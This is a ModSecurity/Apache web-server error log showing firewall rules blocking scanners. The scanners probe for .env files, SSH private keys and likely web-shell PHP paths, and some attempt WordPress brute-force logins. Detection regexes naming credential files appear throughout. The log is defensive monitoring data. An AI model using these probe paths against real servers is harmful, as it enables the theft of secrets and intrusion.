[Tue May 26 16:52:43.696398 2026] [security2:error] [pid 823496:tid 823725] [client 20.63.34.22:12260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/reze.php"] [unique_id "ahWCg5a08mrtyBNpA4PpSAAAAGE"]
[Tue May 26 16:52:44.825943 2026] [security2:error] [pid 823496:tid 823678] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCg5a08mrtyBNpA4PpSgAAADI"]
[Tue May 26 16:52:46.194374 2026] [security2:error] [pid 823496:tid 823736] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWChJa08mrtyBNpA4PpXQAAAGw"]
[Tue May 26 16:52:46.732390 2026] [security2:error] [pid 817651:tid 817655] [remote 178.156.182.155:37920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWChtlGRCPPN1dS2y3E9QAA4gM"]
[Tue May 26 16:52:46.830098 2026] [security2:error] [pid 823496:tid 823643] [client 20.63.34.22:12183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wefile.php"] [unique_id "ahWChpa08mrtyBNpA4PpbAAAAA8"]
[Tue May 26 16:52:46.830209 2026] [security2:error] [pid 823496:tid 823643] [client 20.63.34.22:12183] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wefile.php"] [unique_id "ahWChpa08mrtyBNpA4PpbAAAAA8"]
[Tue May 26 16:52:46.868310 2026] [security2:error] [pid 817651:tid 817800] [client 77.75.77.95:4613] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWChtlGRCPPN1dS2y3E-AAAAJg"]
[Tue May 26 16:52:46.868434 2026] [security2:error] [pid 817651:tid 817800] [client 77.75.77.95:4613] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWChtlGRCPPN1dS2y3E-AAAAJg"]
[Tue May 26 16:52:46.874907 2026] [security2:error] [pid 823496:tid 823742] [client 77.75.77.95:22403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWChpa08mrtyBNpA4PpbgAAAHI"]
[Tue May 26 16:52:46.875042 2026] [security2:error] [pid 823496:tid 823742] [client 77.75.77.95:22403] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWChpa08mrtyBNpA4PpbgAAAHI"]
[Tue May 26 16:52:48.192236 2026] [security2:error] [pid 823496:tid 823682] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCh5a08mrtyBNpA4PpdwAAADY"]
[Tue May 26 16:52:49.234633 2026] [security2:error] [pid 823496:tid 823744] [client 117.198.37.168:58320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCiZa08mrtyBNpA4PpiAAAAHQ"]
[Tue May 26 16:52:49.234780 2026] [security2:error] [pid 823496:tid 823744] [client 117.198.37.168:58320] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCiZa08mrtyBNpA4PpiAAAAHQ"]
[Tue May 26 16:52:49.361102 2026] [security2:error] [pid 823496:tid 823716] [client 20.63.34.22:12265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/xda.php"] [unique_id "ahWCiZa08mrtyBNpA4PpiwAAAFg"]
[Tue May 26 16:52:49.361242 2026] [security2:error] [pid 823496:tid 823716] [client 20.63.34.22:12265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/xda.php"] [unique_id "ahWCiZa08mrtyBNpA4PpiwAAAFg"]
[Tue May 26 16:52:49.633133 2026] [security2:error] [pid 823496:tid 823678] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCiJa08mrtyBNpA4PphAAAADI"]
[Tue May 26 16:52:50.483614 2026] [security2:error] [pid 817651:tid 817897] [client 45.154.98.38:63343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWCitlGRCPPN1dS2y3FIAAAAPk"]
[Tue May 26 16:52:50.483744 2026] [security2:error] [pid 817651:tid 817897] [client 45.154.98.38:63343] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWCitlGRCPPN1dS2y3FIAAAAPk"]
[Tue May 26 16:52:51.235443 2026] [security2:error] [pid 823496:tid 823629] [client 216.213.26.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCi5a08mrtyBNpA4PpngAAAAE"], referer: https://www.anujtradingco.com/
[Tue May 26 16:52:52.156121 2026] [security2:error] [pid 817651:tid 817833] [client 20.63.34.22:12107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/revealability.php"] [unique_id "ahWCjNlGRCPPN1dS2y3FLgAAALk"]
[Tue May 26 16:52:52.156243 2026] [security2:error] [pid 817651:tid 817833] [client 20.63.34.22:12107] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/revealability.php"] [unique_id "ahWCjNlGRCPPN1dS2y3FLgAAALk"]
[Tue May 26 16:52:52.431718 2026] [security2:error] [pid 817651:tid 817825] [client 216.213.26.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCjNlGRCPPN1dS2y3FMgAAALE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1480044&moderation-hash=fd25d04bb179e1e788dc7263d3fcc9ea
[Tue May 26 16:52:52.505733 2026] [security2:error] [pid 823496:tid 823660] [client 185.191.171.13:32608] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahWCjJa08mrtyBNpA4PptAAAACA"]
[Tue May 26 16:52:52.505907 2026] [security2:error] [pid 823496:tid 823660] [client 185.191.171.13:32608] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahWCjJa08mrtyBNpA4PptAAAACA"]
[Tue May 26 16:52:52.652618 2026] [security2:error] [pid 823496:tid 823755] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCi5a08mrtyBNpA4PppwAAAH8"]
[Tue May 26 16:52:53.536217 2026] [security2:error] [pid 817651:tid 817801] [client 5.255.120.167:35878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahWCjdlGRCPPN1dS2y3FQwAAAJk"]
[Tue May 26 16:52:53.787875 2026] [security2:error] [pid 823496:tid 823682] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCjJa08mrtyBNpA4PptgAAADY"]
[Tue May 26 16:52:54.028652 2026] [security2:error] [pid 817651:tid 817875] [client 66.249.89.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.mosykay.com"] [uri "/index.php"] [unique_id "ahWCjdlGRCPPN1dS2y3FPAAAAOM"]
[Tue May 26 16:52:54.631448 2026] [security2:error] [pid 823496:tid 823697] [client 5.255.120.167:35852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahWCjpa08mrtyBNpA4Pp4QAAAEU"]
[Tue May 26 16:52:55.114449 2026] [security2:error] [pid 823496:tid 823656] [client 5.255.120.167:35842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahWCj5a08mrtyBNpA4Pp8QAAABw"]
[Tue May 26 16:52:55.174175 2026] [security2:error] [pid 817651:tid 817793] [client 5.255.120.167:35792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWCj9lGRCPPN1dS2y3FUAAAAJE"]
[Tue May 26 16:52:55.540128 2026] [security2:error] [pid 817651:tid 817832] [client 5.255.120.167:35936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahWCj9lGRCPPN1dS2y3FVQAAALg"]
[Tue May 26 16:52:55.545098 2026] [security2:error] [pid 823496:tid 823755] [client 5.255.120.167:35734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahWCj5a08mrtyBNpA4Pp9QAAAH8"]
[Tue May 26 16:52:55.553241 2026] [security2:error] [pid 823496:tid 823742] [client 62.60.130.233:61250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWCj5a08mrtyBNpA4Pp8gAAAHI"], referer: https://www.facebook.com/
[Tue May 26 16:52:55.644085 2026] [security2:error] [pid 823496:tid 823650] [client 5.255.120.167:35916] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahWCj5a08mrtyBNpA4Pp-gAAABY"]
[Tue May 26 16:52:55.644880 2026] [security2:error] [pid 817651:tid 817864] [client 5.255.120.167:35786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahWCj9lGRCPPN1dS2y3FWAAAANg"]
[Tue May 26 16:52:55.816593 2026] [security2:error] [pid 817651:tid 817850] [client 5.255.120.167:35730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_rsa"] [unique_id "ahWCj9lGRCPPN1dS2y3FWgAAAMo"]
[Tue May 26 16:52:55.879558 2026] [security2:error] [pid 823496:tid 823715] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCjpa08mrtyBNpA4Pp5AAAAFc"]
[Tue May 26 16:52:55.894512 2026] [security2:error] [pid 823496:tid 823739] [client 62.60.130.233:54912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWCj5a08mrtyBNpA4PqAwAAAG8"], referer: https://www.linkedin.com/
[Tue May 26 16:52:55.963470 2026] [security2:error] [pid 823496:tid 823645] [client 216.213.26.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCj5a08mrtyBNpA4PqBQAAABE"], referer: https://anujtradingco.com
[Tue May 26 16:52:56.628736 2026] [security2:error] [pid 823496:tid 823706] [client 20.63.34.22:12128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/forbidals.php"] [unique_id "ahWCkJa08mrtyBNpA4PqEQAAAE4"]
[Tue May 26 16:52:56.628847 2026] [security2:error] [pid 823496:tid 823706] [client 20.63.34.22:12128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/forbidals.php"] [unique_id "ahWCkJa08mrtyBNpA4PqEQAAAE4"]
[Tue May 26 16:52:57.105870 2026] [security2:error] [pid 823496:tid 823632] [client 66.249.64.33:44956] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCj5a08mrtyBNpA4Pp8wAAAAQ"], referer: https://mosykay.com/prizes/264317925
[Tue May 26 16:52:57.424607 2026] [security2:error] [pid 817651:tid 817808] [client 5.255.120.167:35996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.aeromodellingconsultants.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_dsa"] [unique_id "ahWCkdlGRCPPN1dS2y3FYgAAAKA"]
[Tue May 26 16:52:57.824492 2026] [security2:error] [pid 823496:tid 823719] [client 66.249.89.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCj5a08mrtyBNpA4PqAgAAAFs"]
[Tue May 26 16:52:59.136207 2026] [security2:error] [pid 823496:tid 823708] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCkJa08mrtyBNpA4PqGQAAAFA"]
[Tue May 26 16:52:59.225434 2026] [security2:error] [pid 817651:tid 817869] [client 20.63.34.22:12234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/i.php"] [unique_id "ahWCk9lGRCPPN1dS2y3FbAAAAN0"]
[Tue May 26 16:52:59.225543 2026] [security2:error] [pid 817651:tid 817869] [client 20.63.34.22:12234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/i.php"] [unique_id "ahWCk9lGRCPPN1dS2y3FbAAAAN0"]
[Tue May 26 16:52:59.654181 2026] [security2:error] [pid 823496:tid 823660] [client 117.198.37.168:58643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCk5a08mrtyBNpA4PqUwAAACA"]
[Tue May 26 16:52:59.654312 2026] [security2:error] [pid 823496:tid 823660] [client 117.198.37.168:58643] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCk5a08mrtyBNpA4PqUwAAACA"]
[Tue May 26 16:53:00.377684 2026] [security2:error] [pid 823496:tid 823725] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCk5a08mrtyBNpA4PqOAAAAGE"]
[Tue May 26 16:53:01.093305 2026] [security2:error] [pid 823496:tid 823717] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWClJa08mrtyBNpA4PqYAAAAFk"]
[Tue May 26 16:53:01.376486 2026] [autoindex:error] [pid 817651:tid 817879] [client 223.228.15.236:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 16:53:01.399841 2026] [security2:error] [pid 823496:tid 823670] [client 223.228.15.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWClZa08mrtyBNpA4PqbQAAACo"], referer: https://www.ucdc.co.in/
[Tue May 26 16:53:01.699271 2026] [security2:error] [pid 823496:tid 823708] [client 62.60.130.233:59437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aeromodellingconsultants.glorodavionics.com"] [uri "/wp-login.php"] [unique_id "ahWClZa08mrtyBNpA4PqdAAAAFA"], referer: https://www.facebook.com/
[Tue May 26 16:53:01.791251 2026] [security2:error] [pid 817651:tid 817837] [client 20.63.34.22:12249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/900.php"] [unique_id "ahWCldlGRCPPN1dS2y3FiwAAAL0"]
[Tue May 26 16:53:01.791423 2026] [security2:error] [pid 817651:tid 817837] [client 20.63.34.22:12249] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/900.php"] [unique_id "ahWCldlGRCPPN1dS2y3FiwAAAL0"]
